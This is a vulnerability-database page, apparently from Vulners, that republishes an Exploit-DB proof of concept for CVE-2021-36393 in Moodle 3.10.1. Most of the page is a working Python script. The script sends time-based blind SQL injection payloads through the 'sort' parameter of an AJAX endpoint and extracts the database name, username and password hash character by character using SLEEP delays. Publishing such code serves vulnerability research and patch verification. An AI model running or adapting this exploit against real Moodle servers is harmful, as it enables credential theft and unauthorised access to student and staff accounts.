Vulners
Lucene search
Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - (sort) parameter Exploit
| Reporter | Title | Published | Views | Family All 67 |
|---|---|---|---|---|
 | Exploit for Server-Side Request Forgery in Moodle | 4 Nov 202311:45 | – | githubexploit |
| Exploit for SQL Injection in Moodle | 27 Oct 202317:13 | – | githubexploit |
| Exploit for SQL Injection in Moodle | 4 Nov 202311:45 | – | githubexploit |
 | The vulnerability of the Moodle management system, related to the failure to protect SQL queries, allows attackers to execute arbitrary code. | 5 Aug 202100:00 | – | bdu_fstec |
 | CVE-2021-36393 | 2 Feb 202217:41 | – | circl |
 | Moodle SQL注入漏洞 | 19 Jul 202100:00 | – | cnnvd |
 | CVE-2021-36393 | 6 Mar 202300:00 | – | cve |
 | CVE-2021-36393 | 6 Mar 202300:00 | – | cvelist |
 | Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - "sort" parameter | 12 Apr 202400:00 | – | exploitdb |
 | Moodle SQL Injection vulnerability | 6 Mar 202321:30 | – | github |
10
# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter
# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)
# Vendor Homepage: https://moodle.org/
# Software Link:
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2021-36393
import requests
import string
from termcolor import colored
# Request details
URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"
HEADERS = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
"Origin": "http://127.0.0.1:8080",
"Referer": "http://127.0.0.1:8080/moodle/my/",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",
"Connection": "close"
}
# Characters to test
characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"
def test_character(payload):
response = requests.post(URL, headers=HEADERS, json=[payload])
return response.elapsed.total_seconds() >= 3
def extract_value(column, label):
base_payload = {
"index": 0,
"methodname": "core_course_get_enrolled_courses_by_timeline_classification",
"args": {
"offset": 0,
"limit": 0,
"classification": "all",
"sort": "",
"customfieldname": "",
"customfieldvalue": ""
}
}
result = ""
for _ in range(50): # Assumes a maximum of 50 characters for the value
character_found = False
for character in characters_to_test:
if column == "database()":
base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"
else:
base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"
if test_character(base_payload):
result += character
print(colored(f"{label}: {result}", 'red'), end="\r")
character_found = True
break
if not character_found:
break
# Print the final result
print(colored(f"{label}: {result}", 'red'))
if __name__ == "__main__":
extract_value("database()", "Database")
extract_value("username", "Username")
extract_value("password", "Password")
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Apr 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.23988
SSVC